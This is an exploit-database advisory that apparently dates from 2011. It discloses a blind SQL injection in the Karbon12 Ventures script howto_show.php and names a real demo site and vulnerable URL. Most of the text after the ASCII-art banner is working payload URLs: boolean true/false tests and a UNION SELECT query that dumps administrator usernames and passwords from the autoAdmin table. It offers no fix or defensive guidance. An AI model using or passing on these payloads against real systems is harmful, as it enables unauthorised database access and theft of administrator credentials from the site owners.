Karbon12 Ventures suffers from a remote blind SQL injection vulnerability.
6ef97a83fba1e9c9398e9aad28619af767f564bc185ae9f0bda2be22d3f491df
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 _ __ __ __ 1
#1 /' \ __ /'__`\ /\ \__ /'__`\ 0
#0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
#1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
#0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
#1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
#0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
#1 \ \____/ >> Exploit database separated by exploit 0
#0 \/___/ type (local, remote, DoS, etc.) 1
#1 1
#0 [+] Site : 1337day.com 0
#1 [+] Support e-mail : submit[at]1337day.com 1
#0 0
#1 ######################################## 1
#0 I'm OuTLaWz member from Inj3ct0r Team 1
#1 ######################################## 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# spl0itz title: karbon12 ventures (howto_show.php) (Blind/SQL Injection) Multiple Vulnerabilities
# date: 31/08/2011
# author: OuTLaWz aka The_Exploited
# vendor: http://karbon12.com/
# version: 1.0
# category:: webapps
# google dork: no dork bro, is for the lamer ;)
# tested on: windows seven 32bit
# demo site: http://www.phparchitecture.com/
# vuln url: http://www.phparchitecture.com/howto_show.php?id=2
# blind sqli: http://www.phparchitecture.com/howto_show.php?id=2 and 1=1 //\\ http://www.phparchitecture.com/howto_show.php?id=2 and 1=2
# sqli: http://www.phparchitecture.com/howto_show.php?id=-null+UNiON+ALL+SELECT+null,null,group_concat(usrName,0x3a,usrPassword),null,null+FROM+autoAdmin
// 2Pac R.I.P.